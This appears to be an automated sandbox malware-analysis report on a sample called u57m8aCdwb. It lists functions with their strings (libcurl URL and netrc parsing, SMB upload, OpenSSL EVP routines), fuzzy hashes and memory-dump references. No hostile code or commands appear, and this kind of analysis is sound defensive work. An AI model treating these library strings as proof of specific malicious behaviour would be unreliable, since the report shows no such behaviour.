Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
API String ID: 0-1914377741
Opcode ID: 189b9df4a8a39b99e65eca83ba9fb240f42b246960555909781cb33c7cb618a8
Instruction ID: a3eab72d8d75a88b9d04982ff1a4a4c65b5820430762beb96775467522b83617
Opcode Fuzzy Hash: 189b9df4a8a39b99e65eca83ba9fb240f42b246960555909781cb33c7cb618a8
Instruction Fuzzy Hash: F6724C31608B515BE7218A28E4467A6BFD1BF92344F088A2CEDC55B2D3F776DD84C782

Function 005B9880 Relevance: 10.2, Strings: 8, Instructions: 226COMMON

Download Yara Rule

Strings

time, xrefs: 005B9A5C
use-, xrefs: 005B9AD0
retr, xrefs: 005B9A3E
rota, xrefs: 005B9AB1
usev, xrefs: 005B9AEF
ndot, xrefs: 005B9A23
retr, xrefs: 005B9A7A
attempts, xrefs: 005B9A93

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID: attempts$ndot$retr$retr$rota$time$use-$usev
API String ID: 0-2058201250
Opcode ID: 063cdfec93f3ded71bd3a254595e2b7c172f01499c7bd1ecd21966520ddd916b
Instruction ID: 07167823c245e2c3a830ba8ad5921fc5b685e500d453caa12b1b633a7a1a64bf
Opcode Fuzzy Hash: 063cdfec93f3ded71bd3a254595e2b7c172f01499c7bd1ecd21966520ddd916b
Instruction Fuzzy Hash: 426119A5A083016BE714A660AC57FBB7E99BBD0304F14483DF94B96283FE71F9048293

Function 006C0D80 Relevance: 9.5, Strings: 7, Instructions: 705COMMON

Download Yara Rule

Strings

!, xrefs: 006C0F1C
assertion failed: b <= sizeof(ctx->final), xrefs: 006C1124, 006C16BA
assertion failed: b <= sizeof(ctx->buf), xrefs: 006C1339
crypto/evp/evp_enc.c, xrefs: 006C0E31, 006C0E68, 006C0E90, 006C0EB8, 006C0F86, 006C0FE4, 006C106C, 006C111F, 006C11E8, 006C120D, 006C1232, 006C1257, 006C1316, 006C1334, 006C137E, 006C13A3, 006C1432, 006C145A, 006C14A6, 006C14F0, 006C1661, 006C16B5
EVP_EncryptFinal_ex, xrefs: 006C11DE, 006C1203, 006C1228, 006C124D, 006C12F0, 006C130C
EVP_DecryptUpdate, xrefs: 006C0E27, 006C0E5E, 006C0E86, 006C0EAE, 006C0F61, 006C0F7C, 006C0FDA, 006C1062
EVP_DecryptFinal_ex, xrefs: 006C1374, 006C1399, 006C1428, 006C1450, 006C149C, 006C14E6, 006C150E, 006C154B, 006C1657

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID: !$EVP_DecryptFinal_ex$EVP_DecryptUpdate$EVP_EncryptFinal_ex$assertion failed: b <= sizeof(ctx->buf)$assertion failed: b <= sizeof(ctx->final)$crypto/evp/evp_enc.c
API String ID: 0-2550110336
Opcode ID: 8e8cb7b8731a7f2291a2ff7cd4b3f579bdbfaec52702fa1f13d3f6a5a3113f19
Instruction ID: 01ba10cfcc156fa89ecdee4f1490a005e32872a8b3f919c473f17f4078926c0a
Opcode Fuzzy Hash: 8e8cb7b8731a7f2291a2ff7cd4b3f579bdbfaec52702fa1f13d3f6a5a3113f19
Instruction Fuzzy Hash: 68323770B48300ABE724AE689C42F7A77D7EF83B04F18895CF9445A3C3D674EA909756

Function 005CEF90 Relevance: 9.4, Strings: 7, Instructions: 688COMMON

Download Yara Rule

Strings

?, xrefs: 005CF5D5
, xrefs: 005CF772
., xrefs: 005CF30F
xn--, xrefs: 005CF0F5
xn--, xrefs: 005CF15B
?, xrefs: 005CF0D3
;, xrefs: 005CF163

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID: $.$;$?$?$xn--$xn--
API String ID: 0-543057197
Opcode ID: 757cbf58fb4d67290d715f7ab3592c2d3fa61b7508049a4b4c105dc29628d08d
Instruction ID: a003884a18a2e3df2cf535a94ca60bfeca8938102558c3a9880ef247461e5e78
Opcode Fuzzy Hash: 757cbf58fb4d67290d715f7ab3592c2d3fa61b7508049a4b4c105dc29628d08d
Instruction Fuzzy Hash: 5122E475A04342AFEB209B689C45F6F7AE6FF90308F04493DF88A97292E735D944C752

Function 0050A960 Relevance: 9.0, Strings: 6, Instructions: 1491COMMON

Download Yara Rule

Strings

.%d, xrefs: 0050B1D2
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 0050ACAF, 0050ADF1
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 0050A9C6, 0050ACB4, 0050ADF6
0, xrefs: 0050AEBE
(nil), xrefs: 0050AF85
-, xrefs: 0050AF2B

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 0-2555271450
Opcode ID: f8caea9ccd760c8eb9a0e23e397b93c5affed67a24e542428feb31f564804518
Instruction ID: 8881e980e8082bd045697e46c43bb98064c571110c093fd21e0dc46b23a8e7ae
Opcode Fuzzy Hash: f8caea9ccd760c8eb9a0e23e397b93c5affed67a24e542428feb31f564804518
Instruction Fuzzy Hash: 89C25A716087419FD714CE28C4D066EBBE2FFC9354F158A2DE89A9B392D730ED458B82

Function 0050E620 Relevance: 8.5, Strings: 6, Instructions: 1028COMMON

Download Yara Rule

Strings

.%d, xrefs: 0050EE0E
-, xrefs: 0050EC74
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 0050E9AA, 0050EAEB
0, xrefs: 0050EBCA
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 0050E68E, 0050E9AF, 0050EAF0
(nil), xrefs: 0050ECCD

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 0-2555271450
Opcode ID: 1b3f64f95a491b05d4a72df97e9aea118a02fbc6f34411cada0f634c5bd56def
Instruction ID: 45e4c86f9d6b2406275bc2b958b57f002ca7a2c0fe6bda52a4ecc71fa0db2820
Opcode Fuzzy Hash: 1b3f64f95a491b05d4a72df97e9aea118a02fbc6f34411cada0f634c5bd56def
Instruction Fuzzy Hash: 35825C71A083419FD724CE29C88572EBBE1FFC5724F288A2DE9A9972D1D730DC458B52

Function 00566210 Relevance: 7.9, Strings: 6, Instructions: 419COMMON

Download Yara Rule

Strings

password, xrefs: 005665C6
macdef, xrefs: 0056643B
netrc.c, xrefs: 00566243, 00566541, 0056655C, 00566609, 00566627, 005666DD, 005666F7, 0056670E, 0056673F, 0056676B
machine, xrefs: 00566456, 00566656
default, xrefs: 00566471
login, xrefs: 005664FF

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID: default$login$macdef$machine$netrc.c$password
API String ID: 0-1043775505
Opcode ID: 3c325f427703398b5a53549d6fff93d4eb3318e12a831a367cc5050ac4f14480
Instruction ID: 24610cf0c58cf00479516d81da7100f32f9a6afe64b98942a459c85b8ae39638
Opcode Fuzzy Hash: 3c325f427703398b5a53549d6fff93d4eb3318e12a831a367cc5050ac4f14480
Instruction Fuzzy Hash: EBE10174A4C342ABE7208F24D88576B7FD4BF85708F184C2CF88657382E3B59948CB92

Function 0056A7F0 Relevance: 6.9, Strings: 5, Instructions: 687COMMON

Download Yara Rule

Strings

????, xrefs: 0056A95D
SMB upload needs to know the size up front, xrefs: 0056A8DF
\\, xrefs: 0056A914
\, xrefs: 0056A93F
Invalid input packet, xrefs: 0056AC67

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
API String ID: 0-4201740241
Opcode ID: 43fb65b6eae4e421708220e186c4913354b81a2da4065d184eb0db9f2e4c6d62
Instruction ID: 33c6e9b1fa5a295dba63d382d2ee3decece71837fae38ddc97b63f51aa6f5efe
Opcode Fuzzy Hash: 43fb65b6eae4e421708220e186c4913354b81a2da4065d184eb0db9f2e4c6d62
Instruction Fuzzy Hash: 0262D0B0914741DBE724DF24C4907AAB7F4FF98304F04962DE8898B352E774EA94CB96

Function 0088E030 Relevance: 5.8, Strings: 3, Instructions: 2082COMMON

Download Yara Rule

Strings

, xrefs: 0088FEB0
d, xrefs: 0088EA8F
nil), xrefs: 008903FD

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID: $d$nil)
API String ID: 0-394766432
Opcode ID: db23b54d91dfa2cac7a2d174e65bff7bb9c15c805f2660e298899c3d8c45b368
Instruction ID: d263d885e9e776b99687800c84d83ee7d06709e502f36a1b46a6f31b01e0b725
Opcode Fuzzy Hash: db23b54d91dfa2cac7a2d174e65bff7bb9c15c805f2660e298899c3d8c45b368
Instruction Fuzzy Hash: D61359706083458FD720EF28C58462ABBE1FF99314F28492DEA95DB3A1D771ED45CB82

Function 005C8F90 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 256COMMON

Download Yara Rule

APIs

GetUnicastIpAddressTable.IPHLPAPI(?,?), ref: 005C8FE6

Strings

::1, xrefs: 005C91E5
127.0.0.1, xrefs: 005C927D

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID: AddressTableUnicast
String ID: 127.0.0.1$::1
API String ID: 2844252683-3302937015
Opcode ID: 13810d07aec699db70b0e61e546361ff41de1745af326267eba8d08c28ebe37d
Instruction ID: 16f502bbd48d3fd818f3c906ac8d96b829123b02034fe7e73b52c0e01bf2685e
Opcode Fuzzy Hash: 13810d07aec699db70b0e61e546361ff41de1745af326267eba8d08c28ebe37d
Instruction Fuzzy Hash: 64A1C2B1C043429FE710DF64C849B6ABBE0BF95300F159A2DF8889B251F771E990D792

Function 005BC900 Relevance: 5.4, Strings: 4, Instructions: 369COMMON

Download Yara Rule

Strings

0123456789abcdef, xrefs: 005BCA03, 005BCA14, 005BCA9A, 005BCAAB
0123456789, xrefs: 005BCC5E, 005BCC8E
0123456789ABCDEF, xrefs: 005BCA29, 005BCA3E, 005BCAC3, 005BCAD4
:, xrefs: 005BC9B5

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
API String ID: 0-3285806060
Opcode ID: 9e014c4091514e434933b46daa8c538f2fb3dedf814001ad9a91ca57986fa9ba
Instruction ID: fc8ce5f461fd3db0a0e710de386ef5fedee4421e003bc3f8e52722a5b524a643
Opcode Fuzzy Hash: 9e014c4091514e434933b46daa8c538f2fb3dedf814001ad9a91ca57986fa9ba
Instruction Fuzzy Hash: C3D1E376A083458FD7249E28C8813BABFD1BF91304F14893DF9D997281EB70AD54D78A

Function 0088CC70 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

@, xrefs: 0088CE29
gfff, xrefs: 0088CD7C
gfff, xrefs: 0088CD93
., xrefs: 0088CF64

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
